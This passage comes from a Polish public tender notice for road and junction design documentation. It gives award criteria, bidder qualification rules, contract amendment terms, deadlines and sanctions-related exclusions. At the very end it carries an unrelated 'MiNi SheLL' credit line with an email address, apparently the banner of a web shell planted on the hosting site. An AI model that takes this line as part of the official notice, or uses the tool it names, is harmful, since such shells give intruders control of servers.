wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 3 lat przed upływem składania ofert (a jeśli okres działalności jest krótszy, w tym okresie), co najmniej: 1 dokumentacji projektowej rozbudowy/budowy/przebudowy ulicy w ramach której zaprojektowano rozbudowę/budowę/przebudowę sieci uzbrojenia podziemnego oraz zaprojektowano rozbudowę/budowę/przebudowę skrzyżowania ulic z sygnalizacją świetlną o wartości prac projektowych minimum 250 tys. zł brutto.<br/>Uwaga: Jeżeli wykazywane roboty będą potwierdzać wysokość tych robót w walucie innej niż PLN, Zamawiający dokona przeliczenia tej wartości na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa pkt. 1, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) W odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty, do których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty wykonają poszczególni wykonawcy.<br/>c) Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt. VIII.3.a) SWZ (tj. wykaz wykonanych usług), dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, z wyjątkiem zmian określonych w § 12<br/>ust.1 i ust. 2, muszą być dokonane w formie pisemnych aneksów do umowy podpisanych przez<br/>strony, pod rygorem nieważności.<br/>2. Na podstawie art. 455 ust. 1 pkt. 1 ustawy Pzp, Zamawiający przewiduje możliwość dokonania<br/>zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy oraz określa warunki tych zmian:<br/>2.1 w przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót<br/>dodatkowych lub zamiennych, które będą niezbędne dla prawidłowej realizacji projektu a,<br/>których nie można było przewidzieć przed zawarciem umowy oraz w przypadku zmiany<br/>zakresu projektowania wprowadzonej decyzjami administracyjnymi wydanymi lub<br/>uprawomocnionymi po dniu rozstrzygnięcia postępowania skutkującego podpisaniem niniejszej<br/>umowy i dotyczącymi stron umowy, obiektu budowlanego, prowadzonych prac projektowych<br/>lub innych okoliczności mających związek z przedmiotem umowy lub zmiana zakresu<br/>projektowania wprowadzona decyzjami Zamawiającego.<br/>2.2 . Zmianę terminu wykonania umowy dopuszcza się w przypadku:<br/>a) wystąpienia robót dodatkowych lub zamiennych,<br/>b) zmiany zakresu projektowania,<br/>c) pomimo dołożenia należytej staranności i wystąpienia z odpowiednim wyprzedzeniem,<br/>projektant nie uzyska uzgodnień, opinii lub decyzji pozwalających ukończyć w terminie<br/>przedmiot umowy,<br/>d) przedłużonych postępowań administracyjnych związanych z wydawaniem warunków<br/>technicznych, opinii, postanowień i decyzji z przyczyn niezależnych od Zamawiającego lub<br/>Wykonawcy,<br/>e) innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy<br/>skutkujących wstrzymaniem prac projektowych.<br/>2.3 Zmianę wysokości wynagrodzenia dopuszcza się w przypadku:<br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o<br/>minimalnym wynagrodzeniu za pracę, jeżeli zmiana ta będzie miała wpływ na koszty<br/>wykonania zamówienia przez wykonawcę,<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiana ta będzie<br/>miała wpływ na koszty wykonania zamówienia przez wykonawcę<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez wykonawcę,<br/>2.4 Zmianę wysokości wynagrodzenia dopuszcza się w przypadku zmiany cen materiałów lub<br/>kosztów związanych z realizacją zamówienia – klauzula waloryzacyjna.<br/>2.5 Strony dopuszczają zmianę wysokości wynagrodzenia w przypadku wystąpienia robót<br/>nieprzewidzianych, dodatkowych lub zamiennych, koniecznych do prawidłowej realizacji projektu.<br/>(...) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Podstawy wykluczenia, o których mowa w Ustawie z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>1. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835), z<br/>postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>2. Wykluczenie następuje na okres trwania okoliczności określonych w pkt. 1.<br/>3. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie pkt. 1, zamawiający odrzuca wniosek o<br/>dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika<br/>konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty<br/>ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu,<br/>odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza<br/>oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu<br/>prowadzonego postępowania o udzielenie zamówienia publicznego.<br/><br/>II. Wykonawca do oferty (oprócz dokumentów wymienionych w rozdziale VIII SWZ, a wymaganych do złożenia wraz z ofertą)<br/>dołącza również:<br/>a) Formularz ofertowy – interaktywny formularz dostępny na ezamówienia.gov.pl w widoku przedmiotowego postępowania;<br/>b) dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych<br/>dokumentów rejestrowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com